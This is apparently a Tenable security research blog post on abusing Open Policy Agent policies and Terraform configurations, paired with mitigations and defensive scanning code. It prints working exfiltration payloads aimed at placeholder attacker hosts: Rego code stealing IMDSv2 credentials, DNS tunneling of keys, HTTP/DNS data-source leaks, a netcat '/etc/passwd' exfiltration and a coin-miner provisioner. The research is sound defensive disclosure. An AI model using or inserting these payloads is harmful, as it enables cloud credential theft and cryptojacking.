2024-11-18 22:00:00 Author: www.tenable.com

Check out our deep dive into both new and known techniques for abusing infrastructure-as-code and policy-as-code tools, and learn how to defend against them. This blog post expands on the attack techniques presented in our fwd:cloudsec Europe 2024 talk “Who Watches the Watchmen? Stealing Credentials from Policy-as-Code Engines (and beyond).”

Infrastructure-as-code (IaC) is the backbone of DevOps for modern cloud applications. Because IaC deployments are both sensitive and complex, policy engines and policy-as-code languages have emerged as key tools for governing them. Policy engines are also commonly used for authorization in cloud-native applications and for admission control in Kubernetes.

In this blog post, we will explore both known and newly uncovered attack techniques in the domain-specific languages (DSLs) of popular policy-as-code (PaC) and infrastructure-as-code (IaC) platforms, specifically the open source Open Policy Agent (OPA) and HashiCorp’s Terraform. Because these are hardened languages with limited capabilities, they’re supposed to be more secure than standard programming languages, and indeed they are. However, more secure does not mean bulletproof. We'll explore specific techniques we discovered that adversaries can use to abuse these DSLs through third-party code, leading to compromised cloud identities, lateral movement and data exfiltration.

Attack techniques deep dive

Open Policy Agent (OPA)

OPA is a widely used policy engine that serves use cases ranging from microservice authorization to infrastructure policies. Essentially, OPA can analyze any data in JavaScript Object Notation (JSON) form and make policy decisions based on it. It moves policy decision-making out of the target application: the application queries OPA and focuses solely on enforcing the decisions OPA makes based on the provided input and policies. Policies in OPA are written in Rego, a dedicated high-level, declarative policy language (a DSL, if you will). We will soon see that Rego has some interesting built-in functions that, in the wrong hands, can be used to do some pretty evil things.
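To make that query flow concrete, here is a minimal Python sketch of how an application might ask OPA for a decision through its REST Data API (a POST to /v1/data/<path> with the JSON document wrapped in an "input" key). It assumes OPA listens locally on its default port, 8181, and the policy path httpapi/authz/allow is a hypothetical example; the sketch only builds the request and interprets the response, leaving the actual sending to the caller.

```python
import json
from urllib.request import Request

# Assumption: OPA runs locally on its default port.
OPA_URL = "http://localhost:8181"


def build_opa_query(policy_path: str, input_doc: dict, base_url: str = OPA_URL) -> Request:
    """Build (but do not send) a Data API query: POST /v1/data/<policy_path>."""
    url = f"{base_url.rstrip('/')}/v1/data/{policy_path.strip('/')}"
    # OPA expects the JSON document to evaluate under the "input" key.
    body = json.dumps({"input": input_doc}).encode("utf-8")
    return Request(url, data=body, method="POST",
                   headers={"Content-Type": "application/json"})


def is_allowed(response_body: bytes) -> bool:
    """OPA returns the decision under "result"; a missing key means undefined, so deny."""
    return json.loads(response_body).get("result") is True


if __name__ == "__main__":
    # Hypothetical policy path and input document.
    req = build_opa_query("httpapi/authz/allow", {"user": "alice", "method": "GET"})
    print(req.get_method(), req.full_url)
```

In practice the request would be sent with urllib.request.urlopen(req) or any other HTTP client. The application only enforces whatever OPA answers, so whoever controls the policies controls the decision.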

Attack scenario

Our research focused on the supply-chain attack vector in OPA; more specifically, on an attacker gaining access to the supply chain of OPA’s policies. Attackers can leverage this vector to insert a malicious Rego policy that is executed during policy evaluation, to achieve objectives such as credential exfiltration.

In this scenario, OPA regularly fetches policies from a storage bucket, and a web application relies on OPA for authorization. All is well until an attacker gains access through a compromised access key; the attacker needs only write access to the policy bucket. The attacker uploads a malicious policy, which OPA retrieves during its next local update. When the web application sends an authorization request, OPA evaluates the policy and executes the malicious Rego code, potentially leading to dangerous outcomes such as leaking sensitive data to an attacker-controlled server.
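One defensive control against this scenario is to refuse to load any policy file whose digest doesn't match a pinned allowlist stored somewhere the bucket credentials can't reach. The Python sketch below assumes a hypothetical manifest mapping relative policy file names to SHA-256 digests; OPA's own bundle signing feature may be a better fit where it is available.

```python
import hashlib
from pathlib import Path


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def verify_policies(files: dict[str, bytes], pinned: dict[str, str]) -> list[str]:
    """Compare policy contents against pinned SHA-256 digests.

    files:  relative file name -> file contents (e.g. from a downloaded bundle)
    pinned: relative file name -> expected hex digest (hypothetical manifest)
    Returns a list of problems; an empty list means everything matches.
    """
    problems = []
    for name in sorted(files):
        expected = pinned.get(name)
        if expected is None:
            problems.append(f"unexpected policy file: {name}")
        elif sha256_hex(files[name]) != expected:
            problems.append(f"digest mismatch: {name}")
    for name in sorted(set(pinned) - set(files)):
        problems.append(f"missing policy file: {name}")
    return problems


def load_policy_dir(root: str) -> dict[str, bytes]:
    """Read every .rego file under root, keyed by its path relative to root."""
    base = Path(root)
    return {p.relative_to(base).as_posix(): p.read_bytes() for p in base.rglob("*.rego")}
```

A loader would call verify_policies(load_policy_dir(path), pinned) and abort the update if the result is non-empty, so a policy uploaded by the attacker never reaches evaluation.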

Exfiltrating source code and environment variables

We could find only a single blog post exploring malicious abuse of Rego. In it, software engineer Liam Galvin showcased built-in OPA functions that attackers could abuse: opa.runtime().env for accessing environment variables and http.send for exfiltrating them. Additionally, the input keyword can be used to exfiltrate the HCL code sent to OPA for evaluation.

Taking it further

The opa.runtime and http.send functions drew negative attention in 2022, when a researcher discovered a vulnerability that bypassed the WithUnsafeBuiltins function, which can be used to block certain built-in functions and fail policies that use them. These two functions were cited as examples of functions that organizations might want to block. An organization that is aware of OPA's security considerations, and that can block these functions without breaking its use case, would probably block them through OPA’s Capabilities feature. This got us thinking:

- Is it possible to fetch cloud credentials without using the opa.runtime function?

- Is it possible to leak data outside of the environment without using the http.send function?


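As a sketch of that hardening, the Python function below takes a capabilities document (the JSON consumed by OPA's Capabilities feature; recent OPA versions should be able to print the current one with opa capabilities --current) and drops the built-ins discussed in this post. The blocklist and the optional allow_net value are assumptions to adapt to your deployment; an empty allow_net list is intended to deny every host to http.send and net.lookup_ip_addr.

```python
import json

# Built-ins discussed in this post (assumption: adjust to your use case).
RISKY_BUILTINS = frozenset({"http.send", "net.lookup_ip_addr", "opa.runtime"})


def restrict_capabilities(caps: dict, blocked=RISKY_BUILTINS, allow_net=None) -> dict:
    """Return a copy of an OPA capabilities document without the blocked built-ins.

    If allow_net is given, it replaces the host allowlist used by network built-ins;
    an empty list means no hosts are allowed.
    """
    restricted = dict(caps)  # shallow copy; the input document is not modified
    restricted["builtins"] = [b for b in caps.get("builtins", []) if b.get("name") not in blocked]
    if allow_net is not None:
        restricted["allow_net"] = sorted(allow_net)
    return restricted


def write_restricted(src_path: str, dst_path: str, allow_net=None) -> None:
    """Read a capabilities file, restrict it, and write the result to dst_path."""
    with open(src_path, encoding="utf-8") as f:
        caps = json.load(f)
    with open(dst_path, "w", encoding="utf-8") as f:
        json.dump(restrict_capabilities(caps, allow_net=allow_net), f, indent=2)
```

The resulting file can then be passed to OPA commands that accept a --capabilities flag, such as opa build or opa eval, so that policies calling a removed built-in fail to compile instead of running.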

Extracting credentials from IMDSv2

Using the opa.runtime function, we can fetch environment variables, including potential cloud credentials. This sparked our curiosity: if its usage is blocked on the OPA server side, can we still extract cloud credentials somehow?

We then decided to try fetching credentials from the AWS Instance Metadata Service (IMDS), considering that OPA might run on a cloud instance with an attached role. Using the Bash commands from the AWS documentation as a reference, we crafted Rego code that interacts with IMDSv2, which is the default in new environments and less straightforward to work with. This enabled us to retrieve instance role credentials and leak them to our external server using a single built-in function: http.send. It took several iterations; as anyone who has worked with Rego knows, it loves to keep you guessing with unhelpful error messages. Finally, this is what our code looked like:

```rego
package extract_creds

default token_ttl_seconds = "21600"

# Step 1: request an IMDSv2 session token (IMDSv2 requires a PUT)
req1 := {"url": "http://169.254.169.254/latest/api/token",
    "method": "put",
    "headers": {"X-aws-ec2-metadata-token-ttl-seconds": token_ttl_seconds}}

resp1 := http.send(req1)

# Step 2: use the token to get the name of the role attached to the instance
req2 := {"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
    "method": "get",
    "headers": {"X-aws-ec2-metadata-token": resp1["raw_body"]}}

resp2 := http.send(req2)

# Step 3: fetch the temporary credentials for that role
url_val := concat("/", ["http://169.254.169.254/latest/meta-data/iam/security-credentials", resp2["raw_body"]])

req3 := {"url": url_val,
    "method": "get",
    "headers": {"X-aws-ec2-metadata-token": resp1["raw_body"]}}

resp3 := http.send(req3)

# Step 4: send the credentials to the attacker's server in a request header
req4 := {"url": "http://<attacker_server>/",
    "method": "put",
    "headers": {"X-aws-ec2-metadata-token": resp3["raw_body"]}}

resp4 := http.send(req4)
```

Attack demo

It’s important to note that allowing policies, especially those sourced from third parties, to interact with other internal servers and services is highly discouraged and exposes the environment to significant risks such as credential theft. Remember that IMDSv2 does not make your instance role credentials bulletproof: they are still reachable by anyone who achieves code execution on the machine. At the end of this blog post, we reference some effective mitigations against such attacks.
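A simple review aid along these lines is to flag literal URLs in third-party policy code that point at internal addresses. The Python sketch below (the function name is hypothetical) treats link-local addresses such as the IMDS endpoint 169.254.169.254, as well as private and loopback addresses, as internal. It is only a heuristic: it does not resolve hostnames, so a DNS name pointing at an internal address, or a URL assembled at evaluation time with concat as in the policy above, will not be caught; network-level restrictions remain the real control.

```python
import ipaddress
from urllib.parse import urlsplit


def targets_internal_address(url: str) -> bool:
    """Return True if the URL's host is localhost or a link-local, private or loopback IP literal."""
    host = urlsplit(url).hostname
    if host is None:
        return False
    if host == "localhost":
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        # A hostname rather than an IP literal; resolving it is out of scope here.
        return False
    return ip.is_link_local or ip.is_private or ip.is_loopback
```

The IPv6 IMDS endpoint, fd00:ec2::254, falls in the private fc00::/7 range, so it is flagged as well.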



DNS tunneling

That’s all well and good if we can run the http.send function within policies. But what happens if an OPA deployment restricts its use? We wanted to see whether it was possible to exfiltrate data by other means. We dove into OPA’s documentation again, and the Net category’s net.lookup_ip_addr function looked particularly interesting: it actively looks up a host and returns its IP addresses. So we thought: what if we look up a domain under the attacker’s control and monitor the DNS requests?

We set up a server to capture DNS requests and ran a simple policy using the net.lookup_ip_addr function. Sure enough, a request arrived at our server. Next, we tried embedding sensitive data as a subdomain of our malicious domain (a technique known as DNS tunneling). We concatenated the access key and secret key hard-coded in the input Terraform configuration passed to OPA as subdomains of our domain, and passed the resulting domain string to the net.lookup_ip_addr function. We then ran the Rego policy:

```rego
package dns_tunneling

parent_domain := "<attacker_domain>"

# Form the domain tunneling string and perform the lookup
result = domain_str {
    provider_list := input.provider.aws
    provider_list != []
    provider := provider_list[0]
    access_key := provider.access_key
    secret_key := provider.secret_key
    domain_arr := [access_key, secret_key, parent_domain]
    domain_str := concat(".", domain_arr)
    addr := net.lookup_ip_addr(domain_str)
}
```

And, voilà! The request, with the access key embedded in it, arrived at our listener.

So, the net.lookup_ip_addr function is another function you might consider restricting or at least looking out for in policies, since it also introduces the risk of data exfiltration from your OPA deployment.
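To look out for these functions, a lightweight pre-merge check can search Rego sources for calls to them. The Python sketch below flags http.send, net.lookup_ip_addr and opa.runtime calls along with their line numbers. It is deliberately naive (it strips # comments without understanding string literals and does not actually parse Rego), so treat it as a review aid that complements, rather than replaces, enforcement through OPA's capabilities.

```python
import re

RISKY_CALLS = ("http.send", "net.lookup_ip_addr", "opa.runtime")
# A risky built-in name followed by "(", not preceded by an identifier character or dot.
_CALL = re.compile(r"(?<![\w.])(" + "|".join(re.escape(c) for c in RISKY_CALLS) + r")\s*\(")


def find_risky_calls(rego_source: str) -> list[tuple[int, str]]:
    """Return (line number, built-in name) for each risky call in the source."""
    hits = []
    for lineno, line in enumerate(rego_source.splitlines(), start=1):
        code = line.split("#", 1)[0]  # naive: also cuts at '#' inside string literals
        hits.extend((lineno, m.group(1)) for m in _CALL.finditer(code))
    return hits
```

Run against the DNS tunneling policy above, it would report the net.lookup_ip_addr call on the line that performs the lookup.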

Up until this point, we've talked about techniques in OPA, which is a policy engine. We were curious about Terraform, since it also uses a declarative language, and wanted to see if it might be affected by similar techniques.

Terraform

Terraform has long been a widely adopted IaC tool thanks to its declarative, platform-agnostic nature, community support and shareable components. Terraform configurations are also written in a dedicated high-level, declarative DSL: HashiCorp Configuration Language (HCL). Terraform has two kinds of third-party components that can be shared through the Terraform Registry or other public or private registries: modules and providers. These are commonly used for efficiency, and even for enhanced security when used correctly. However, if used carelessly, they can introduce a serious supply chain risk.



Terraform CI/CD risk

Using HashiCorp’s “Setup Terraform” GitHub Action, many organizations configure every pull request to trigger Terraform's format, init, validate and plan phases. HashiCorp’s documentation even presents the option of testing pull requests with terraform plan. It seems logical to run the plan phase on every PR in a Terraform code repository to identify necessary changes before applying them. Or does it?

It turns out that the plan phase is not as innocent as one might think. While resources are not deployed during this stage, data sources (another kind of Terraform block, which fetches external data for use throughout the configuration) are executed at this stage.

To recap, in many CI/CD pipelines today, terraform plan runs as part of a pull_request trigger. This means that any developer who can open a pull request (usually anyone in open-source projects, or any developer in the organization for private repositories) and update Terraform files can trigger code execution on the GitHub runner without any code review. This poses a risk: an external attacker in a public repository, or a malicious insider (or an external attacker with a foothold) in a private repository, could abuse a pull request for their malicious objectives.
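A quick way to audit for this pattern is to check whether a workflow both triggers on pull requests and runs terraform plan. The Python sketch below works on a workflow file that has already been parsed into a dictionary (for example with PyYAML's yaml.safe_load). The function names are hypothetical, and matching on the literal string "terraform plan" will miss wrapper scripts, reusable workflows and variants such as terraform -chdir=infra plan.

```python
PR_EVENTS = {"pull_request", "pull_request_target"}


def workflow_triggers(workflow: dict) -> set:
    """Return the workflow's trigger event names."""
    # YAML 1.1 parsers such as PyYAML load the bare key `on` as the boolean True.
    on = workflow.get("on", workflow.get(True))
    if isinstance(on, str):
        return {on}
    if isinstance(on, (list, dict)):
        return set(on)
    return set()


def plans_on_pull_request(workflow: dict) -> bool:
    """True if a PR-triggered workflow has a step that runs `terraform plan`."""
    if not PR_EVENTS & workflow_triggers(workflow):
        return False
    for job in (workflow.get("jobs") or {}).values():
        for step in job.get("steps") or []:
            if "terraform plan" in str(step.get("run", "")):
                return True
    return False
```

Workflows flagged this way are candidates for moving plan behind review, or at least behind the pre-plan scanning described in the mitigations below.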

Example of malicious techniques for abusing data sources

As we just learned, data sources run during terraform plan, which significantly lowers the barrier to entry for attackers, making it possible in some repositories to execute unreviewed changes during CI/CD.

(Note: To use a data source in a Terraform configuration, you need to import the provider that implements it.)

External data source

Using the external data source, you can run custom code on the machine running Terraform. According to HashiCorp, the external data source serves as an “escape hatch” for exceptional situations. Its abuse was also explored in Alex Kaskaso’s blog, demonstrating how you can run code during the Terraform Plan phase by writing custom Terraform providers, or by using the external data source from the existing external provider.

To achieve code execution on the host, you simply need to import the external provider and insert an external data block in your configuration, referencing a local script file:

```hcl
data "external" "example" {
  program = ["python", "${path.module}/exfil_env_results.py"]
}
```

HTTP data source

Using the HTTP data source, you can fetch necessary data for your configuration - but it also opens the door for malicious exfiltration. As xssfox demonstrated, a malicious Terraform module can easily leak secrets to an attacker-controlled domain.

The HTTP data source might also be effective for fetching credentials from the IMDS. However, we couldn’t extract credentials from IMDSv2, since obtaining a session token requires the HTTP PUT method, which the HTTP data source doesn’t support: its method argument accepts only GET, HEAD and POST.

```hcl
data "http" "supersecurerequest" {
  url = "https://<attacker_server>/${aws_secretsmanager_secret_version.secret_api_key.secret_string}"
}
```

DNS data source

As we previously discussed, we discovered a DNS tunneling technique in OPA, allowing us to stealthily leak sensitive data. This got us thinking: Why not try DNS tunneling in Terraform, too?

We looked into HashiCorp’s documentation and found HashiCorp’s official DNS provider. Similar to Rego’s net.lookup_ip_addr, its data sources allow you to perform DNS lookups. Once again, we tried embedding a secret as a subdomain of our malicious domain. We then listened for DNS requests and ran terraform plan in the hope of catching the secret on our external server.

```hcl
data "dns_a_record_set" "superlegitdomain" {
  host = "${aws_secretsmanager_secret_version.password.secret_string}.<attacker_domain>"
}
```

And, boom! The request, including the embedded secret string, was caught by our listener.

To recap, here’s the flow of events:

- terraform plan triggers on a pull request

- The unreviewed code includes a malicious data source

- Before the DevOps engineer can say 'supercalifragilisticexpialidocious,' the sensitive data is already off to the attacker’s server
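Both DNS tunneling variants, Rego's net.lookup_ip_addr and the DNS provider's data sources, leave a telltale sign in DNS query logs: unusually long or random-looking subdomain labels. The Python sketch below implements one common heuristic for spotting them. The thresholds are arbitrary assumptions to tune against your baseline, and treating the last two labels as the registered domain is a simplification that misjudges names under suffixes such as co.uk.

```python
import math
from collections import Counter


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character of s."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def looks_like_dns_tunneling(qname: str, max_label_len: int = 20,
                             entropy_threshold: float = 3.5) -> bool:
    """Flag a query name whose subdomain labels are unusually long or random-looking."""
    labels = qname.rstrip(".").split(".")
    # Simplification: treat the last two labels as the registered domain.
    for label in labels[:-2]:
        if len(label) > max_label_len:
            return True
        if len(label) >= 12 and shannon_entropy(label) >= entropy_threshold:
            return True
    return False
```

An AWS secret access key alone is 40 characters long, so a query carrying one as a label trips the length check regardless of the entropy threshold.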

Example of malicious techniques for abusing provisioners

HashiCorp describes provisioners as a last resort, saying that they allow you to “model specific actions on the local machine or on a remote machine in order to prepare servers or other infrastructure objects for service.” In simple words, you can run custom code on the machine running Terraform or on the newly provisioned infrastructure.

“Local-exec” provisioner

The local-exec provisioner “invokes a local executable after a resource is created,” according to HashiCorp. It runs the supplied command on the machine running Terraform, essentially allowing arbitrary shell command execution. For example, you could leak the contents of /etc/passwd to an attacker-controlled server:

```hcl
provisioner "local-exec" {
  command = "cat /etc/passwd | nc <attacker_server> 1337"
}
```

“Remote-exec” provisioner

The remote-exec provisioner “invokes a script on a remote resource after it is created” according to HashiCorp. It allows you to run custom code on newly provisioned infrastructure. For example, you could run a coin miner on a newly created EC2 machine:

```hcl
provisioner "remote-exec" {
  script = "./xmrig/xmrig.sh"
}
```

Other notable Terraform research

- Security engineers Mike Ruth and Francisco Oca demonstrated multiple attack scenarios against Terraform Enterprise (TFE) and Terraform Cloud (TFC) and also released a tool that can stealthily run terraform apply during terraform plan.

- Daniel Grzelak from Plerion discovered some interesting attack primitives, demonstrating how you can delete resources or run malicious code through a custom provider when the only access you have is write access to the state file, which is often stored in S3.

Mitigations and best practices

- Implement granular role-based access control (RBAC) and follow the principle of least privilege. This applies to the local user running the IaC or PaC framework, the users who can access it via API, and the associated cloud roles. Consider using separate roles for the Terraform plan and apply stages, to prevent unreviewed IaC modifications from changing cloud infrastructure.

- Only use third-party components, such as Terraform modules and providers or OPA policies, from trusted sources. Verify their integrity to ensure no unauthorized changes were made before they are executed.

- Set up application-level and cloud-level logging for monitoring and analysis.

- Limit the network and data access of the applications and the underlying machines. To prevent communication with other internal servers through OPA policies, as discussed in the attack techniques section, you may use OPA’s capabilities.json file to restrict outbound network connections (using the allow_net field to restrict the hosts that can be contacted by the http.send and net.lookup_ip_addr functions).

- Scan before you plan! Prevent automatic execution of unreviewed and potentially malicious code in your CI/CD pipeline by placing your scanner before the terraform plan stage.*

*According to our testing, most common scanners fail to detect most of the risks we’ve discussed. Currently, in order to detect code execution and exfiltration techniques in IaC and PaC, you need to create custom policies according to your organization’s needs and your environment’s baseline. For more details, watch the recording of our talk “Who Watches the Watchmen? Stealing Credentials from Policy-as-Code Engines (and beyond)" at the fwd:cloudsec Europe 2024 conference. You can find the slides here.
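As a starting point for such custom checks, the Python sketch below flags the constructs discussed in this post in .tf files: data sources from the external, http and dns providers, which run during plan, and local-exec and remote-exec provisioners. It is a regex-based illustration, not a Tenable feature or a full HCL parser: it assumes quoted block labels, ignores JSON-syntax configurations (.tf.json) and won't see the same constructs inside remote modules, which would need to be fetched and scanned separately.

```python
import re
from pathlib import Path

# Data sources that execute code or reach the network during `terraform plan`.
PLAN_TIME_DATA = re.compile(r'^\s*data\s+"(external|http|dns_[a-z_]+)"\s+"([^"]+)"', re.M)
# Provisioners that run commands on the runner or on the new resource.
PROVISIONERS = re.compile(r'^\s*provisioner\s+"(local-exec|remote-exec)"', re.M)


def scan_terraform(source: str) -> list[str]:
    """Return a description of each flagged block in one Terraform file's source."""
    findings = [f'data "{m.group(1)}" "{m.group(2)}"' for m in PLAN_TIME_DATA.finditer(source)]
    findings += [f'provisioner "{m.group(1)}"' for m in PROVISIONERS.finditer(source)]
    return findings


def scan_directory(root: str) -> dict[str, list[str]]:
    """Scan every .tf file under root; return only files with findings."""
    results = {}
    for path in sorted(Path(root).rglob("*.tf")):
        hits = scan_terraform(path.read_text(encoding="utf-8"))
        if hits:
            results[str(path)] = hits
    return results
```

Run as a pipeline step before terraform plan, a non-empty result from scan_directory could fail the job and route the pull request to manual review.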

How Tenable Cloud Security can help

Shifting cloud security left helps you improve security and compliance before runtime. Tenable offers IaC scanning as part of Tenable Cloud Security, our comprehensive cloud native application protection platform (CNAPP). Tenable Cloud Security enables organizations to scan and detect misconfigurations and other risks in their IaC configurations to harden cloud infrastructure environments as part of the CI/CD pipeline and take action on cloud exposures.

To get more information, check out our “Shift Left on Cloud Infrastructure Security” solution overview and go to our page “Shift-left with IaC security.”

Shelly Raban

Shelly Raban is a Senior Security Researcher at Tenable, specializing in cloud security research. In her previous roles, Shelly worked as a security researcher and threat hunting expert at Hunters. With 7 years of experience in cybersecurity, Shelly has conducted extensive research in detection engineering, host forensics, malware analysis, and reverse engineering. Outside of work, Shelly loves spending time with her two baby cats.
